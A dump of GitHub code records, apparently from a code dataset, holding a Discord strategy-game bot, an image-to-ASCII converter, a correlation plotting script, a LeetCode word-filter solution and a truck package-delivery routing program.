\"> You are disbanding {num:.0f} soldiers at a disband cost of {cost:.0f} per soldier, for \" \\\n \"a total of {total:.0f} DP.\" \\\n \"Do you wish to continue?\\n> \\n> \" \\\n \":thumbsup: Yes\\n> \" \\\n \":thumbsdown: No\".format(num=amount, cost=db.get_attribute(player_id, Attributes.SOLDIER_DISBAND_COST),\n total=amount * db.get_attribute(player_id, Attributes.SOLDIER_DISBAND_COST))\n do_disband = await user_react_on_message(bot, ctx, output, ctx.author, {\n '\\N{THUMBS UP SIGN}': True,\n '\\N{THUMBS DOWN SIGN}': False,\n })\n if do_disband:\n results = db.disband_soldiers(player_id,amount)\n await ctx.send(results[1])\n return\n else:\n await ctx.send(\"> Canceled\")\n return\n else:\n await ctx.send(\"> Nice try.\")\n return\n\n\n@bot.command()\nasync def research(ctx, *, tech_name):\n import formatting\n from user_interaction import user_react_on_message\n tech_id = db.get_tech_id(tech_name)\n player_id = db.get_player_id_from_context(ctx)\n if tech_id is None:\n await ctx.send('> Technology \"{}\" does not exist.'.format(tech_name))\n return\n if player_id is None:\n await ctx.send('> You have not joined this game yet.')\n return\n success_cost = db.calculate_tech_cost(player_id, tech_id)\n multiplier = db.get_attribute(player_id, Attributes.RESEARCH_COST_MULTIPLIER)\n attempt_costs = tuple(map(lambda x: db.get_attribute(player_id, x) * multiplier, (\n Attributes.DIVINE_INSPIRATION_COST,\n Attributes.AWAKE_REVELATION_COST,\n Attributes.ASLEEP_REVELATION_COST,\n Attributes.DIVINE_AVATAR_COST\n )))\n\n success_probs = tuple(map(lambda x: db.get_attribute(player_id, x) * multiplier, (\n Attributes.DIVINE_INSPIRATION_RATE,\n Attributes.AWAKE_REVELATION_RATE,\n Attributes.ASLEEP_REVELATION_RATE,\n Attributes.DIVINE_AVATAR_RATE\n )))\n output_text = formatting.request_research_method(tech_name, success_probs, success_cost, attempt_costs)\n research_method = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': 'divine_inspiration',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': 'awake_revelation',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER C}': 'asleep_revelation',\n '\\N{REGIONAL INDICATOR SYMBOL LETTER D}': 'divine_avatar'\n })\n if research_method is None:\n await ctx.send(\"Timed out\")\n return\n \n priest_text = '> Do you wish to use priests for this research? \\n'\\\n '> :regional_indicator_y: Yes\\n'\\\n '> :regional_indicator_n: No'\n use_priests = await user_react_on_message(bot, ctx, priest_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER Y}': True,\n '\\N{REGIONAL INDICATOR SYMBOL LETTER N}': False\n })\n if use_priests is None:\n await ctx.send(\"> Timed out\")\n return\n \n result_text = db.attempt_research(player_id, tech_id, research_method, use_priests)[1]\n await ctx.send(result_text)\n\n # ctx.author.id\n\n\n@bot.command()\nasync def battle(ctx, player_name: str, quantity: int):\n from user_interaction import user_react_on_message\n import formatting\n\n attacker_id = db.get_player_id_from_context(ctx)\n target_id = db.get_player_by_name(player_name, db.get_game_id_from_context(ctx))\n if attacker_id is None:\n await ctx.send('> You have not joined this game yet.')\n return\n if target_id is None:\n await ctx.send('> Player \"{}\" does not exist.'.format(player_name))\n return\n \n # expected_outcome = db.expected_damage(attacker_id, target_id, quantity)\n\n # # Phase 1: output text\n # output_text = formatting.battle_ask_continue(\n # player_name,\n # quantity,\n # expected_outcome[2],\n # expected_outcome[0][0],\n # expected_outcome[0][1],\n # expected_outcome[0][2],\n # expected_outcome[1]\n # )\n\n # do_battle = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n # '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': True,\n # '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': False,\n # })\n # if do_battle is None:\n # await ctx.send(\"> Timed out\")\n # return\n\n do_battle = True\n if do_battle:\n results = db.attack(attacker_id, target_id, quantity)\n if results[0]:\n remaining_attackers = db.get_attribute(attacker_id, Attributes.ATTACK_ELIGIBLE_SOLDIERS)\n remaining_soldiers = db.get_army(attacker_id)\n remaining_enemy_soldiers = db.get_army(target_id)\n result_text = formatting.battle_report(\n results[1][0][0],\n results[1][0][1],\n results[1][0][2],\n remaining_enemy_soldiers,\n results[1][1],\n remaining_soldiers,\n remaining_attackers\n )\n \n await ctx.send(\"> \" + result_text)\n return\n else:\n await ctx.send(\"> \" + str(results[1]))\n return\n else:\n await ctx.send(\"> Battle canceled.\")\n return\n\n\n@bot.command()\nasync def convert(ctx, quantity: int):\n from user_interaction import user_react_on_message\n import formatting\n player_discord = ctx.author.id\n\n if player_discord is None:\n await ctx.send('> You have not joined this game yet.')\n return\n\n output_text = formatting.conversion_target_type(\n db.get_attribute(player_discord, Attributes.NEUTRAL_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.NEUTRAL_CONVERSION_COST),\n db.get_attribute(player_discord, Attributes.ENEMY_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.ENEMY_CONVERSION_COST),\n db.get_attribute(player_discord, Attributes.ENEMY_PRIEST_CONVERSION_RATE),\n db.get_attribute(player_discord, Attributes.ENEMY_PRIEST_CONVERSION_COST)\n )\n\n conversion_target = await user_react_on_message(bot, ctx, output_text, ctx.author, {\n '\\N{REGIONAL INDICATOR SYMBOL LETTER A}': \"neutral\",\n '\\N{REGIONAL INDICATOR SYMBOL LETTER B}': \"enemy\",\n '\\N{REGIONAL INDICATOR SYMBOL LETTER C}': \"enemy_priest\",\n })\n\n if conversion_target == \"neutral\":\n results = db.attempt_conversion(converter_player_id=player_discord,\n quantity=quantity,\n person_type=conversion_target,\n target_player_id=None)\n if results[0]:\n result_text = \"> Successfully converted {converts}.\".format(converts=results[1])\n else:\n result_text = results[1]\n await ctx.send(result_text)\n return\n elif conversion_target in [\"enemy\", \"enemy_priest\"]:\n def check(message):\n return message.author.id == ctx.author.id and db.user_name_exists(message.content)\n \n await ctx.send(\"> Please specify the player to attempt to convert away from. \\n\"\n \"Avoid unnecessary whitespaces or characters.\")\n other_player_name = (await bot.wait_for('message', timeout=30.0, check=check)).content\n other_player_id = db.get_player_by_name(other_player_name)\n\n success, results = db.attempt_conversion(converter_player_id=player_discord,\n quantity=quantity,\n person_type=conversion_target,\n target_player_id=other_player_id)\n\n if success:\n result_text = \"> Successfully converted {converts}, spending {cost} DP and priest channeling power.\".format(\n converts=results[0], cost=results[1])\n else:\n result_text = results\n \n await ctx.send(result_text)\n\n\n@bot.command()\nasync def help(ctx, *command_context):\n await ctx.send(HelpfileReader.read(PREFIX, command_context))\n\n@bot.command()\nasync def whois(ctx, member: discord.Member):\n game_id = db.get_game_id_from_context(ctx)\n name = member.name\n if member.nick:\n name = member.nick\n if db.user_discord_id_exists(member.id, game_id):\n from formatting import pretty_list\n\n player_ids = db.get_players_by_discord_id(member.id, game_id)\n display_names = map(db.get_display_name, player_ids)\n await ctx.send(\"{name} plays as {display_names}\".format(name=name, display_name=pretty_list(display_names)))\n else:\n await ctx.send(\"{name} has not joined the game\".format(name=name))\n\n@bot.command()\nasync def proxy(ctx, *, text):\n if db.context_grants_admin(ctx):\n await ctx.send(text)\n await ctx.message.delete()\n\n\ndef start_bot():\n token = SecretManager.secrets['discord']['clientToken']\n\n if token is not None and len(token) > 0:\n logging.info(\"Starting client\")\n bot.run(token)\n else:\n logging.error(\"Could not start: invalid token\")\n\n\nif __name__ == '__main__':\n start_bot()\n", "repo_name": "casithepython/handofgods", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 20358, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 16, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 16, "usage_type": "name"}, {"api_name": "discord.ext.commands.when_mentioned_or", "line_number": 17, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 17, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 29, "usage_type": "name"}, {"api_name": "main.create_player", "line_number": 35, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 42, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 43, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 43, "usage_type": "call"}, {"api_name": "main.send_power", "line_number": 44, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 57, "usage_type": "call"}, {"api_name": "main.player_get_pantheon", "line_number": 59, "usage_type": "call"}, {"api_name": "main.create_pantheon", "line_number": 67, "usage_type": "call"}, {"api_name": "main.join_pantheon", "line_number": 68, "usage_type": "call"}, {"api_name": "main.get_pantheon_by_name", "line_number": 68, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 76, "usage_type": "call"}, {"api_name": "main.leave_pantheon", "line_number": 82, "usage_type": "call"}, {"api_name": "HelpfileReader.read", "line_number": 94, "usage_type": "call"}, {"api_name": "main.context_grants_admin", "line_number": 96, "usage_type": "call"}, {"api_name": "bot_admin.tech", "line_number": 98, "usage_type": "call"}, {"api_name": "bot_admin.user", "line_number": 100, "usage_type": "call"}, {"api_name": "bot_admin.newturn", "line_number": 102, "usage_type": "call"}, {"api_name": "bot_admin.kill", "line_number": 104, "usage_type": "call"}, {"api_name": "bot_admin.help", "line_number": 106, "usage_type": "call"}, {"api_name": "bot_admin.pantheon", "line_number": 108, "usage_type": "call"}, {"api_name": "bot_admin.update", "line_number": 110, "usage_type": "call"}, {"api_name": "bot_admin.join", "line_number": 112, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 123, "usage_type": "call"}, {"api_name": "main.get_player_names", "line_number": 126, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 127, "usage_type": "call"}, {"api_name": "main.get_display_name", "line_number": 128, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 134, "usage_type": "call"}, {"api_name": "Attributes.POWER", "line_number": 134, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 135, "usage_type": "call"}, {"api_name": "Attributes.FUNCTIONARIES", "line_number": 135, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 136, "usage_type": "call"}, {"api_name": "Attributes.SOLDIERS", "line_number": 136, "usage_type": "attribute"}, {"api_name": "main.get_army", "line_number": 137, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 138, "usage_type": "call"}, {"api_name": "Attributes.PRIESTS", "line_number": 138, "usage_type": "attribute"}, {"api_name": "main.current_turn", "line_number": 139, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 139, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 145, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 147, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 147, "usage_type": "call"}, {"api_name": "main.get_player", "line_number": 153, "usage_type": "call"}, {"api_name": "formatting.default_info", "line_number": 155, "usage_type": "call"}, {"api_name": "formatting.income_info", "line_number": 159, "usage_type": "call"}, {"api_name": "formatting.war_info", "line_number": 163, "usage_type": "call"}, {"api_name": "formatting.conversion_info", "line_number": 167, "usage_type": "call"}, {"api_name": "formatting.research_info", "line_number": 171, "usage_type": "call"}, {"api_name": "main.get_player_techs", "line_number": 176, "usage_type": "call"}, {"api_name": "main.get_tech_name", "line_number": 178, "usage_type": "call"}, {"api_name": "main.get_tech_description", "line_number": 178, "usage_type": "call"}, {"api_name": "main.get_player_attributes", "line_number": 184, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 198, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 203, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 203, "usage_type": "call"}, {"api_name": "main.get_attribute_id", "line_number": 205, "usage_type": "call"}, {"api_name": "main.get_army", "line_number": 210, "usage_type": "call"}, {"api_name": "main.get_buff_cost", "line_number": 211, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 216, "usage_type": "call"}, {"api_name": "main.cast_buff", "line_number": 222, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 237, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 244, "usage_type": "call"}, {"api_name": "Attributes.PRIEST_COST", "line_number": 244, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 245, "usage_type": "call"}, {"api_name": "Attributes.PRIEST_COST", "line_number": 245, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 246, "usage_type": "call"}, {"api_name": "main.recruit_priests", "line_number": 252, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 265, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_COST", "line_number": 265, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 266, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_COST", "line_number": 266, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 268, "usage_type": "call"}, {"api_name": "main.recruit_soldiers", "line_number": 273, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 289, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 295, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_DISBAND_COST", "line_number": 295, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 296, "usage_type": "call"}, {"api_name": "Attributes.SOLDIER_DISBAND_COST", "line_number": 296, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 297, "usage_type": "call"}, {"api_name": "main.disband_soldiers", "line_number": 302, "usage_type": "call"}, {"api_name": "main.get_tech_id", "line_number": 317, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 318, "usage_type": "call"}, {"api_name": "main.calculate_tech_cost", "line_number": 325, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 326, "usage_type": "call"}, {"api_name": "Attributes.RESEARCH_COST_MULTIPLIER", "line_number": 326, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 327, "usage_type": "call"}, {"api_name": "Attributes.DIVINE_INSPIRATION_COST", "line_number": 328, "usage_type": "attribute"}, {"api_name": "Attributes.AWAKE_REVELATION_COST", "line_number": 329, "usage_type": "attribute"}, {"api_name": "Attributes.ASLEEP_REVELATION_COST", "line_number": 330, "usage_type": "attribute"}, {"api_name": "Attributes.DIVINE_AVATAR_COST", "line_number": 331, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 334, "usage_type": "call"}, {"api_name": "Attributes.DIVINE_INSPIRATION_RATE", "line_number": 335, "usage_type": "attribute"}, {"api_name": "Attributes.AWAKE_REVELATION_RATE", "line_number": 336, "usage_type": "attribute"}, {"api_name": "Attributes.ASLEEP_REVELATION_RATE", "line_number": 337, "usage_type": "attribute"}, {"api_name": "Attributes.DIVINE_AVATAR_RATE", "line_number": 338, "usage_type": "attribute"}, {"api_name": "formatting.request_research_method", "line_number": 340, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 341, "usage_type": "call"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 354, "usage_type": "call"}, {"api_name": "main.attempt_research", "line_number": 362, "usage_type": "call"}, {"api_name": "main.get_player_id_from_context", "line_number": 373, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 374, "usage_type": "call"}, {"api_name": "main.get_game_id_from_context", "line_number": 374, "usage_type": "call"}, {"api_name": "main.attack", "line_number": 405, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 407, "usage_type": "call"}, {"api_name": "Attributes.ATTACK_ELIGIBLE_SOLDIERS", "line_number": 407, "usage_type": "attribute"}, {"api_name": "main.get_army", "line_number": 408, "usage_type": "call"}, {"api_name": "main.get_army", "line_number": 409, "usage_type": "call"}, {"api_name": "formatting.battle_report", "line_number": 410, "usage_type": "call"}, {"api_name": "formatting.conversion_target_type", "line_number": 440, "usage_type": "call"}, {"api_name": "main.get_attribute", "line_number": 441, "usage_type": "call"}, {"api_name": "Attributes.NEUTRAL_CONVERSION_RATE", "line_number": 441, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 442, "usage_type": "call"}, {"api_name": "Attributes.NEUTRAL_CONVERSION_COST", "line_number": 442, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 443, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_CONVERSION_RATE", "line_number": 443, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 444, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_CONVERSION_COST", "line_number": 444, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 445, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_PRIEST_CONVERSION_RATE", "line_number": 445, "usage_type": "attribute"}, {"api_name": "main.get_attribute", "line_number": 446, "usage_type": "call"}, {"api_name": "Attributes.ENEMY_PRIEST_CONVERSION_COST", "line_number": 446, "usage_type": "attribute"}, {"api_name": "user_interaction.user_react_on_message", "line_number": 449, "usage_type": "call"}, {"api_name": "main.attempt_conversion", "line_number": 456, "usage_type": "call"}, {"api_name": "main.user_name_exists", "line_number": 468, "usage_type": "call"}, {"api_name": "main.get_player_by_name", "line_number": 473, "usage_type": "call"}, {"api_name": "main.attempt_conversion", "line_number": 475, "usage_type": "call"}, {"api_name": "HelpfileReader.read", "line_number": 491, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 494, "usage_type": "attribute"}, {"api_name": "main.get_game_id_from_context", "line_number": 495, "usage_type": "call"}, {"api_name": "main.user_discord_id_exists", "line_number": 499, "usage_type": "call"}, {"api_name": "main.get_players_by_discord_id", "line_number": 502, "usage_type": "call"}, {"api_name": "main.get_display_name", "line_number": 503, "usage_type": "attribute"}, {"api_name": "formatting.pretty_list", "line_number": 504, "usage_type": "call"}, {"api_name": "main.context_grants_admin", "line_number": 510, "usage_type": "call"}, {"api_name": "SecretManager.secrets", "line_number": 516, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 519, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 522, "usage_type": "call"}]}
+{"seq_id": "86434805528", "text": "import PIL.Image\n\n#arreglo de caracteres que reemplazaran los pixeles de la imgaen\n#cambielos para obtener diferentes resultados\n\nAsciiChars=[\"@\", \"#\", \"S\", \"%\", \"?\", \"*\", \"+\", \";\", \":\", \",\", \".\"]\n\n#funcion que le hace un resize a la imagen\n\ndef resizeImage(image, newWidth=100):\n width, height = image.size\n ratio=height/width\n newHeight=int((newWidth*ratio)/2)\n resizedImage=image.resize((newWidth, newHeight))\n return (resizedImage)\n\n#funcion que cambia elc olor de los pixeles a una escala de grises\n\ndef grayfy(image):\n grayScaleImage=image.convert(\"L\")\n return (grayScaleImage)\n\n\n#funcion que cambia pixeles por caracteres dentro de arreglo declarado arriba\ndef pixelsToAscii(image):\n pixels=image.getdata()\n characters = \"\".join([AsciiChars[pixel//25] for pixel in pixels])\n return (characters)\n\n\ndef imageToAscii(path, newWidth=100):\n try:\n image=PIL.Image.open(path)\n except:\n print(\"ruta no valida\")\n return\n newImageData=pixelsToAscii(grayfy(resizeImage(image)))\n pixel_count=len(newImageData)\n asciiImage=\"\\n\".join(newImageData[i:(i+newWidth)] for i in range(0, pixel_count, newWidth ))\n\n return(asciiImage)\n\n", "repo_name": "SenpaiSuchil/arte-generativo", "sub_path": "imageToAscii.py", "file_name": "imageToAscii.py", "file_ext": "py", "file_size_in_byte": 1190, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.Image.open", "line_number": 33, "usage_type": "call"}, {"api_name": "PIL.Image.Image", "line_number": 33, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "8589520458", "text": "import numpy as np\r\nimport csv \r\nimport plotly.express as px\r\n\r\ndef plot(path):\r\n with open(path) as f:\r\n read_graph = csv.DictReader(f)\r\n fig = px.scatter(read_graph, x = \"Roll No\", y=\"Days Present\")\r\n fig.show()\r\n\r\n\r\ndef open_data(path):\r\n roll = []\r\n days = []\r\n with open(path) as r:\r\n read = csv.DictReader(r)\r\n\r\n for i in read:\r\n roll.append(float(i[\"Roll No\"]))\r\n days.append(float(i[\"Days Present\"]))\r\n\r\n return {\"x\" : roll, \"y\": days} \r\n\r\ndef calc(value):\r\n corr = np.corrcoef(value[\"x\"], value[\"y\"])\r\n print(\"The corelation co-efficient of the above values is: \" ,corr[0,1])\r\n\r\n\r\n\r\ndef main():\r\n path = \"F:\\Python works\\Python Program 2\\WhiteHatJt\\C106\\Student Marks vs Days Present.csv\"\r\n value = open_data(path)\r\n calc(value)\r\n plot(path)\r\n\r\nmain()\r\n\r\n", "repo_name": "Circuit-Overtime/Correlation", "sub_path": "C106d.py", "file_name": "C106d.py", "file_ext": "py", "file_size_in_byte": 854, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "csv.DictReader", "line_number": 7, "usage_type": "call"}, {"api_name": "plotly.express.scatter", "line_number": 8, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 8, "usage_type": "name"}, {"api_name": "csv.DictReader", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.corrcoef", "line_number": 25, "usage_type": "call"}]}
+{"seq_id": "30124326128", "text": "# # Note: we are going to use defaultdict(no keyError because has a default key value) for this problem. \n# One example of defaultdict with set:\n# from collections import defaultdict\n\n# defaultdict_demo = defaultdict(set)\n\n# defaultdict_demo['one'].add(1)\n# defaultdict_demo['two'].add(2)\n# defaultdict_demo['one'].add('1')\n# defaultdict_demo['three']\n \n# -> return:\n \n# {'three': set(), 'two': {2}, 'one': {1, '1'}}\n\n# print(dict(defaultdict_demo.items()))\n\nclass WordFilter:\n\n def __init__(self, words: List[str]):\n from collections import defaultdict\n self.prefixes = defaultdict(set)\n self.suffixes = defaultdict(set)\n \n # weights dictionary contains each word and its index; e.x. {\"apple\":0}\n self.weights = {}\n \n for index, word in enumerate(words):\n prefix, suffix = '', ''\n \n for char in list(word):\n prefix += char\n \n self.prefixes[prefix].add(word)\n # print(self.prefixes)\n for char in list(word[::-1]):\n suffix += char\n self.suffixes[suffix[::-1]].add(word)\n # print(self.suffixes)\n self.weights[word] = index\n # print(self.weights)\n \n\n def f(self, prefix: str, suffix: str) -> int:\n weight = -1\n \n # Note: and is a Logical AND that returns True if both the operands are true whereas '&' is a bitwise operator in Python that acts on bits and performs bit by bit operation. Note: When an integer value is 0, it is considered as False otherwise True when using logically.\n\n \n # print(\"****a\", self.prefixes['a'] ) \n # # -> **** \n # print(\"****e\", self.suffixes['e'] ) \n \n # print(\"****\", self.prefixes['a'] & self.suffixes['e']) \n # -> {'appe', 'apple'} # Note: Find the common words\n # print(\"****\", \"apple\" in self.prefixes[prefix] & self.suffixes[suffix] )\n # -> True\n \n # Note: self.prefixes[prefix] & self.suffixes[suffix] -> returns a set with the common words in both self.prefixes[prefix] & self.suffixes[suffix]\n # -> then we check what word(s) satisfies are in both list (aka contains both prefixes and the suffixes)\n \n # -> We traverse through all available words and find the one with the highest weight!\n \n for word in self.prefixes[prefix] & self.suffixes[suffix]:\n if self.weights[word] > weight:\n weight = self.weights[word]\n return weight\n\n\n# Your WordFilter object will be instantiated and called as such:\n# obj = WordFilter(words)\n# param_1 = obj.f(prefix,suffix)\n", "repo_name": "xulinxi/Leetcode", "sub_path": "DailyChallenge/LC_745.py", "file_name": "LC_745.py", "file_ext": "py", "file_size_in_byte": 2786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 22, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "20698843289", "text": "# Omid Ershad\n# Student ID: 011123774\n\n# Import required packages\nimport csv\nimport datetime\n\nimport truck\nfrom create_hash_map import ChainingHashTable\nfrom package import Package\n\n# Initialize hash table to store packages\nhashtable = ChainingHashTable()\n\n# Read package data from CSV\npackage_file = \"package_file.csv\"\naddress_file = \"address_table.csv\"\ndistance_file = \"distance_table.csv\"\n\nwith open(package_file) as package_data:\n package_reader = csv.reader(package_data)\n for package in package_reader:\n # Create package object\n package_id = int(package[0])\n address = package[1]\n city = package[2]\n state = package[3]\n zip = package[4]\n deadline = package[5]\n weight = package[6]\n status = \"At Hub\"\n\n # Create package object and insert into hash table\n package_object = Package(package_id, address, city, state, zip, deadline, weight)\n hashtable.insert(package_id, package_object)\n\n# Read address data from CSV\naddress_list = []\nwith open(address_file) as address_data:\n address_reader = csv.reader(address_data)\n for address in address_reader:\n address_list.append(address)\n\n# Read distance data from CSV\ndistance_list = []\nwith open(distance_file) as distance_data:\n distance_reader = csv.reader(distance_data)\n for distance in distance_reader:\n distance_list.append(distance)\n\n\n# Function to get address index from address list\ndef get_index_for_address(address):\n for address_data in address_list:\n if address == address_data[2]:\n return int(address_data[0])\n return -1\n\n\n# Function to calculate distance between addresses\ndef distance_between_two_addresses(address1, address2):\n address_index1 = get_index_for_address(address1)\n address_index2 = get_index_for_address(address2)\n distance = distance_list[address_index1][address_index2]\n if distance == '':\n distance = distance_list[address_index2][address_index1]\n distance_result = float(distance)\n return distance_result\n\n\n# Create method to deliver packages for given truck\ndef deliver_truck(truck):\n print(truck.package_list)\n current_location = truck.current_address\n for package_id in truck.package_list:\n package = hashtable.search(package_id)\n distance = distance_between_two_addresses(current_location, package.address)\n\n\n# Manually load in packages to trucks\ntruck1 = truck.Truck(truck_id=1, package_list=[1, 13, 14, 15, 16, 20, 29, 30, 31, 34, 37, 40, 19], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=8))\ntruck2 = truck.Truck(truck_id=2, package_list=[3, 6, 18, 25, 28, 32, 36, 38, 24, 26, 27, 33, 35], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=9, minutes=5))\ntruck3 = truck.Truck(truck_id=3, package_list=[9, 2, 4, 5, 7, 8, 10, 11, 12, 17, 21, 22, 23, 39], status=\"Hub\",\n current_address=\"4001 South 700 East\",\n departure_time=datetime.timedelta(hours=10, minutes=30))\n\nimport copy\n\n# Function to deliver packages for a truck\ndef deliver_packages(truck):\n # Make a deep copy of the truck's package list, so we don't modify the original\n packages = copy.deepcopy(truck.package_list)\n current_time = truck.departure_time\n current_location = truck.current_address\n\n while packages:\n # Find the nearest package\n nearest_package_id = find_nearest_package(current_location, packages)\n package = hashtable.search(nearest_package_id)\n # Update current location\n current_time += datetime.timedelta(hours=distance_between_two_addresses(current_location, package.address) / 18)\n truck.mileage += distance_between_two_addresses(current_location, package.address)\n current_location = package.address\n # Deliver it\n package.delivery_time = current_time\n package.departure_time = truck.departure_time\n # Remove delivered package from list\n packages.remove(nearest_package_id)\n\n return current_time\n\n# Define a function to find nearest package\ndef find_nearest_package(current_location, package_ids):\n nearest_distance = float(\"inf\")\n nearest_package_id = None\n\n for package_id in package_ids:\n package = hashtable.search(package_id)\n distance = distance_between_two_addresses(current_location, package.address)\n if distance < nearest_distance:\n nearest_distance = distance\n nearest_package_id = package_id\n\n return nearest_package_id\n\n# Deliver packages for each truck and determine their return times\ntruck1_return = deliver_packages(truck1)\ntruck2_return = deliver_packages(truck2)\nif truck1_return < truck2_return:\n truck3.departure_time = truck1_return\nelse:\n truck3.departure_time = truck2_return\n\n# Fix deliver for package number #9\ndeliver_packages(truck3)\n\n\n# Print total mileage of all trucks combined\ndef print_total_mileage(truck1, truck2, truck3):\n total_mileage = truck1.mileage + truck2.mileage + truck3.mileage\n print(\"Total Mileage:\", total_mileage)\n\n\n# Main loop for user interface\nwhile True:\n print(\"-\" * 40)\n # put mileage here\n print_total_mileage(truck1, truck2, truck3)\n print(\"-\" * 40)\n print(\"1. List all packages with statuses\")\n print(\"2. Get status for specific package\")\n print(\"3. List status for specific time\")\n print(\"0. Exit\")\n\n option = input(\"Enter your option: \")\n if option == \"1\":\n for i in range(1, 41):\n print(hashtable.search(i))\n elif option == \"2\":\n package_number = input(\"Which Package (1-40): \")\n print(hashtable.search(int(package_number)))\n elif option == \"3\":\n test = input(\"Enter a time (HH:MM): \")\n h, m = test.split(\":\")\n user_time = datetime.timedelta(hours=int(h), minutes=int(m))\n for i in range(1, 41):\n print(hashtable.search(i).calculate_status(user_time))\n elif option == \"0\":\n break\n", "repo_name": "omiershad/C950_WGU_Omid_Ershad", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 6101, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "create_hash_map.ChainingHashTable", "line_number": 13, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 21, "usage_type": "call"}, {"api_name": "package.Package", "line_number": 34, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 40, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 47, "usage_type": "call"}, {"api_name": "truck.package_list", "line_number": 73, "usage_type": "attribute"}, {"api_name": "truck.current_address", "line_number": 74, "usage_type": "attribute"}, {"api_name": "truck.package_list", "line_number": 75, "usage_type": "attribute"}, {"api_name": "package.address", "line_number": 77, "usage_type": "attribute"}, {"api_name": "truck.Truck", "line_number": 81, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 83, "usage_type": "call"}, {"api_name": "truck.Truck", "line_number": 84, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 86, "usage_type": "call"}, {"api_name": "truck.Truck", 